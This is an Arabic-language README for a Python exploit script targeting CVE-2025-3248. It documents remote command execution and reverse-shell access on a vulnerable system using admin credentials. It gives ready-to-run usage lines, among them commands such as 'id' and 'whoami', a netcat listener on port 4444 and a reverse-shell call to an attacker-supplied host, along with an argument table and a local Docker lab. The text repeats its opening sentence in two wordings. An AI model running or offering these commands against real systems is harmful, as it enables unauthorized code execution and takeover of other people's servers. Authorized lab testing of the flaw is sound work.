
يستغل هذا النص البرمجي Python الثغرة CVE-2025-3248 لتنفيذ أوامر عشوائية أو إنشاء قشرة عكسية على نظام ضعيف. المصادقة مطلوبة لاستخدام هذا الاستغلال.
يقوم هذا النص البرمجي بلغة Python باستغلال CVE-2025-3248 لتنفيذ أوامر عشوائية أو إنشاء شِل عكسي (reverse shell) على نظام ضعيف. المصادقة مطلوبة لاستخدام هذا الاستغلال.
requestsقم بتثبيت التبعيات باستخدام:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
* يجب عليك تحديد إما أمر (-c) أو كلاً من --lhost و --lport للشل العكسي.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
ابدأ مستمعًا على جهازك:
nc -lvnp 4444
ثم قم بتشغيل:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
يمكنك نشر صورة Docker باستخدام الأمر التالي:
podman compose up -d
ستكون الصورة متاحة على http://localhost:7860.
إسناد ملف compose: هذا المستودع
هذا النص البرمجي لأغراض تعليمية واختبار الاختراق المصرح به فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
تم إنشاء هذا الملف التمهيدي بواسطة الذكاء الاصطناعي.
| الوسيطة | الوصف | مطلوب |
|---|
-u, --url | عنوان URL الأساسي للهدف (مثال: https://target.com) | نعم |
-l, --login | اسم مستخدم المسؤول | نعم |
-p, --password | كلمة مرور المسؤول | نعم |
-c, --command | الأمر المراد تنفيذه على الهدف | لا* |
--proxy | عنوان URL للوكيل (مثال: http://127.0.0.1:8080) | لا |
--lhost | المضيف المحلي للشل العكسي | لا* |
--lport | المنفذ المحلي للشل العكسي | لا* |